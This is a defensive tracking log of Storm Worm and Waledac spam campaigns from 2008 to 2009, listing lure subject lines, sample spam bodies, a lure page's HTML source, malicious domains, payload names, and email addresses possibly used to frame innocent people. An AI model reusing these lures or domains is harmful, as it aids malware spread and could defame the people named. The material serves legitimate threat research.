I Love Being In Love With You  http://supersameas.com/

Payload = StormCodec8.exe and StormCodec.exe

April 14

Spams linking to a variety of websites owned by innocent parties, for either a file called "redir.html", which links to sugaronly.com, a Canadian Pharmacy scam pharma site, or a file called "video.exe", which is the Storm Worm download. All sites have both files, though usually only one is spammed.

Sample spam:

Hello, make a wise decision,  get your meds from the most reliable provider.
http://www.google.it/pagead/iclk?sa=l&ai=USRUkh&num=28816&[line break inserted]
  adurl=http://justleopold.com/redir.html
Coupon #9FQN
guthrey jael

Substituting "video.exe" for "redir.html" on justleopold.com will attempt to download Storm Worm on your computer.

May 19

The emailed infection links use IP addresses, concealing the domain names from research and takedown.

Subject: Missing you with every breath
The Mood for Love http://xxx.x.xx.64/

Subject: I Knew I Loved You
You & Me http://xxx.xxx.xxx.102/

Payload = iloveyou.exe loveyou.exe

Adding any subdirectory causes a redirection (http://xxx.x.xx.64/blah/) to

  • catsharp.com *
  • followequate.com [client hold by Xin Net, May 28]
  • lowsmell.com *
  • picturewest.com *
  • posestory.com *
  • printlength.com *
  • producemorning.com *
  • pressrose.com *
  • industrydictionary.com

which are Canadian Pharmacy brands.
* means these run on a fast-flux botnet of 20 IP addresses, refreshing every 2 minutes.

June 1

Sample spam:

Subject: You have touched my heart

Missing you http://xxx.xx.xx.73/

The page source contains

<html>
<head>
<title>Who is loving you?</title>
</head>
<body>
<center><img src="lr.gif"><br>
Who is loving you? Do you want to know? 
Just <a href="loveyou.exe">click here</a> and choose either "Open" or "Run".
</body>
</html>

The payload is loveyou.exe

June 18

Short emails using an IP based URL (http://xxx.xxx.xxx.xxx) with a theme of the China Earthquake and sometimes mention of the Beijing Olympics. The click-through shows a page with a black screen promising a video. Clicking to see the video installs the Storm infection.

Sampled from the subject lines:

2008 Olympic Games are under the threat
A new powerful disaster in China
A new deadly catastrophe in China
China is paralyzed by new earthquake

Payload: beijing.exe

June 25

Storm is sending both the "China disaster" story as well as a seemingly incompetent email with a reply address:

Hello, my friend.

Do you want to buy any stuff: any kind of pills, oem software, cool porn?
Just mail me back, i'll find the best offer for you.

My Email: gpdude22@yahoo.com

The embedded email addresses vary:

  • cstygstra@gmail.com
  • gpdude22@yahoo.com
  • infrared35@gmail.com
  • jim@tegelaar.com
  • wagz_is_god@yahoo.com

This may be a "Joe job" designed to tarnish the reputation of those people.

June 29

Sample message:

> Date: Sun, 29 Jun 2008 01:32:24 +0900
> From: xxxxx@xxxxx.xxx
> Subject: You make my world special
 -
> My heart belongs to you http://latinlovesite.com/

Known domains

  • latinlovesite.com
  • makinglovedirect.com
  • theloveparade.com
  • yourloveletter.com
  • youronlinelove.com
  • lollypopycandy.com (used as a name server)
  • verynicebank.com (used as a name server)

Payload = winner.exe mylove.exe

July 4

Storm worm themes frequently correlate with seasonal holidays, specifically those celebrated in the U.S. July 4th is Independence Day in the U.S., and a major holiday. Storm sites display a faux-video image with fireworks. The message on the sites is "Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it."

It is interesting to note that storm sites do not mark major holidays not observed in the U.S., like Guy Fawkes Day, May Day, International Women's Day, or Bastille Day, nor are they fooled by U.S. public holidays like Labor Day whose significance among the general public is mostly limited to being a day off work. It suggests the involvement of someone who has at least lived for some time in the U.S. But clumsy English usage, like "firework" used in the singular or "stars and strips (sic) forever," suggests a non-native speaker is writing the subject headings and body messages, as well as the messages included on the sites themselves.

The spam has links to infected IP addresses, not domain names. All storm infected servers display the same image, not just the ones with fixed IP addresses which are included in spam. Subject headings and bodies include

Amazing firework 2008
Amazing Independence Day show
America for You and Me
America the Beautiful
American Independence Day
Bright and joyful Fourth of July
Celebrate Independence
Celebrating Fourth of July
Celebrating the Glory of our Nation
Celebrating the spirit of our Country
Celebrations have already begun
Fabulous Independence Day firework
God bless America
Happy Birthday, America!
Happy Fourth of July
Happy Independence Day
Happy Independence Day!!
Independence Day firework broke all records
Light up the sky
Sparkling Celebration of Independence Day
Spectacular fireworks show
Stars and Strips forever
Super 4th!
The best of 4th of July Salute
The best firework you've ever seen
Time for Fireworks
Well done 4th!
Wish your friends a happy Independence Day

Payload=fireworks.exe
(Whoever chose the name for the payload apparently is aware that "fireworks" is always plural.)

July 21

The U.S. Government began to realize the plan to replace the Dollar with the
"Amero", the new currency of the North American Currency Union. Canada, the
United States of America and Mexico have resolved to unit in order to resist
the Worldwide Financial Crysis. You can become acquainted with the plan of
the implementation of Amero, just click on the icon under this text.

Payload = amero.exe

The Amero image is also found at http://signaveritae.wordpress.com/2008/01/09/our-failing-dollar/


July 29

Storm spam arrives with subject headings about the FBI spying on Facebook users. (It goes nearly unnoticed in the midst of a deluge of spam linking to trojan downloads on hacked websites; those spams carry similar subject lines consisting of inflammatory news headlines.)

Subject: The F.B.I.'s plan to "profile" Facebook

FBI may strike Facebook http://SmartNewsRadio.com/

Other possible lines used as subjects or body text include

F.B.I. can watch our conversation through Facebook
F.B.I. tries to fight Facebook
FBI Watching Possible Terrorists on Facebook
FBI Watching Hezbollah in Facebook
FBI bypasses Facebook to nail you
The F.B.I. has a new way of tracking Facebook

Payload = fbi_facebook.exe

Gary Warner has a more extensive listing on his blog page

Obviously, people who visit one of those infected sites and download storm on their computers will have someone spying on them, but it won't be the FBI.

August 2008 - December 2008

August 14

Targeting followers of headline news stories, the Storm Trojan team sent millions of emails with catchy headlines, secretly diverting users who clicked on the "msnbc" or "CNN" link to a decoy site. The click on a newslink downloaded the Storm trojan. For example, the payload would be masquerading as an upgrade to Adobe Flash player, adobe_flash.exe. 13 out of 20 antivirus companies identified it as Storm. For example:

 F-Secure Anti-Virus  	Found Email-Worm:W32/Zhelatin.YH, Trojan-Downloader.Win32.Exchanger.nb

January 2009 -

January 1

Are there still people willing to click on ecards? Someone thinks so. The malware is no longer detected as "storm"/tibs/zhelatin, but as "walezof", a distinct malware entity.

Why are we including it here? Beyond the "ecard" theme, the similarities in the botnet hosting are strong: These domains use a single seat botnet with zero second refresh. Storm had been the only botnet we'd observed with that pattern. Analysts at Shadowserver report it uses a similar peer-to-peer network, as well. It's either being distributed by the same criminals or else by a very ardent admirer.

The ultimate smoking gun would be to find one of the old surviving Storm domains now displaying the same content or sitting on the same botnet, but those domains now refuse connections altogether (rather than displaying different content) and they are not on a fast-flux botnet at all.


January 17

Waledac's similarities to Storm continue. Storm previously tried to lure people into clicking with fake sites offering news about some catastrophic disaster; now it's a spoof of Barack Obama's campaign website with a fake news item claiming he is refusing to assume office next week. Like storm, all the previous domains with ecard themed names have also begun displaying the Obama theme.

Payloads:

president.exe obama.exe statement.exe baracknews.exe obamanews.exe barack.exe barackspeech.exe barackblog.exe obamablog.exe obamaspeech.exe usa.exe news.exe speech.exe blog.exe love.exe youandme.exe onlyme.exe onlyyou.exe you.exe video.exe readme.exe postcard.exe pdf.exe doc.exe file.exe


January 25

Waledac assumes a Valentine's theme, though not a lot of spam is arriving in the US. It changes to a puppy dog Valentine theme on February 9, but still only there if you go looking for it.

Further reading